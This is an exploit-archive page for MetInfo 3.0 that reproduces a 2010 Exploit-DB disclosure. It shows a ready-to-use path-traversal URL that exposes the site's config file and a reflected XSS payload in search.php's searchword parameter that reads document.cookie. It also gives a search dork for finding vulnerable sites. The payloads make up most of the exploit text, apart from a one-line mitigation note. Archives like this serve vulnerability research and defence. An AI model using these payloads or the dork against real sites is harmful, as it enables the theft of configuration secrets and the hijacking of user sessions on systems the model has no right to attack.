header-logo
Suggest Exploit
vendor:
Metinfo
by:
anT!-Tr0J4n
7,5
CVSS
HIGH
Source Code Disclosure & XSS
79, 79
CWE
Product Name: Metinfo
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:metinfo:metinfo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

metinfo3.0 Mullti Vulnerability

metinfo3.0 source code disclosure Vulnerability: An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. XSS Vulnerability: An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application containing malicious JavaScript code.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: metinfo3.0 Mullti Vulnerability

# Date :       10-11-2010

# Author :    anT!-Tr0J4n

# Version :     3.0

#DorK     :    Powered by MetInfo 3.0 
 
# Home    :    www.Dev-PoinT.com : http://milw0rm.ws

#Email     :    D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

Vendor£   :   http://www.metinfo.cn/

#Greetz    :   Dev-PoinT.com   ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l

#special thanks to milw0rm.ws team   :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu


========================================================
metinfo3.0 source code disclosure Vulnerability 
========================================================

[>] exploit ->

[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]

EX :

[+] http://localhost/metinfo/templates/met001/../../config


======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================

[>] exploit -> XSS Vulnerability


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] Site               : Inj3ct0r.com
[+] Support e-mail  : submit[at]inj3ct0r.com
[+] I'm anT!-Tr0J4n member from Inj3ct0r Team

Navigation

Suggest Exploit

Services By CQR